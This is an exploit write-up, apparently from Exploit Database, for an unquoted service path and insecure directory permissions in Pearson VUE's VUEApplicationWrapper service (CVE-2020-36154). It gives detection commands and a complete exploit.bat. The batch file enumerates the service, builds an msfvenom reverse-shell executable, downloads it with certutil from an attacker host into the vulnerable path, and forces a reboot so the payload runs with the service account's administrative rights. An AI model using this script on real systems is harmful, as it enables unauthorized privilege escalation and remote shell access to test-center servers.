UI
Search…
Pearson Vue - VUEApplicationWrapper Unquoted Service Path (CVE-2020-36154)
Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path
The Application Wrapper is the component that automates the Pearson VUE Testing System. The Wrapper is a scheduler that runs in the background on the test center’s server. VUEApplicationWrapper service has an unquoted service path vulnerability and insecure file permissions on "\Pearson VUE\" directory that allows to overwrite by everyone so that unauthorized local user can leverage privileges to VUEService user that has administrative rights.
1
# Detection of unquoted service path:
2
3
C:\Users\VUEService>wmic service get name, pathname, displayname, startmode| findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" |findstr /i /v """
4
VUE Application Wrapper
5
VUEApplicationWrapper C:\Pearson VUE\VUE
6
Testing System\bin\VUEWrapper.exe
7
Auto
8
9
C:\Users\VUEService>sc qc VUEApplicationWrapper
10
[SC] QueryServiceConfig SUCCESS
11
12
SERVICE_NAME: VUEApplicationWrapper
13
TYPE : 10 WIN32_OWN_PROCESS
14
START_TYPE : 2 AUTO_START
15
ERROR_CONTROL : 1 NORMAL
16
BINARY_PATH_NAME : C:\Pearson VUE\VUE TestingSystem\bin\VUEWrapper.exe
17
LOAD_ORDER_GROUP :
18
TAG : 0
19
DISPLAY_NAME : VUE Application Wrapper
20
DEPENDENCIES : lanmanworkstation
21
SERVICE_START_NAME : .\VUEService
22
23
24
#Detection of insecure file permissions:
25
26
PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\"
27
28
29
Directory: C:\
30
31
32
Path Owner Access
33
---- ----- ------
34
Pearson Vue BUILTIN\Administrators Everyone Allow FullControl...
35
Copied!
exploit.bat :
1
@ECHO OFF
2
ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i"Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
3
wmic service get name,pathname,displayname,startmode | findstr /i "Auto" |findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """
4
sc qc VUEApplicationWrapper
5
powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'"
6
ECHO [+] Enumeration was completed successfully.
7
::Create VUE.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell.
8
::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address>LPORT=443 -f exe > VUE.exe
9
ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your privileges, you might be able to get VUEService user privileges after windows was rebooted.
10
certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\PearsonVUE\VUE.exe"
11
ECHO [*] Downloading VUE executable...
12
PAUSE
13
IF EXIST "C:\Pearson VUE\VUE.exe" (
14
ECHO [+] The download was successful.
15
) ELSE (
16
ECHO [-] The download was unsuccessful.
17
PAUSE
18
)
19
ECHO [!] If you continue, system will be rebooted.
20
PAUSE
21
shutdown /r /t 0
22
::code end
Copied!
Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path
Exploit Database
Copy link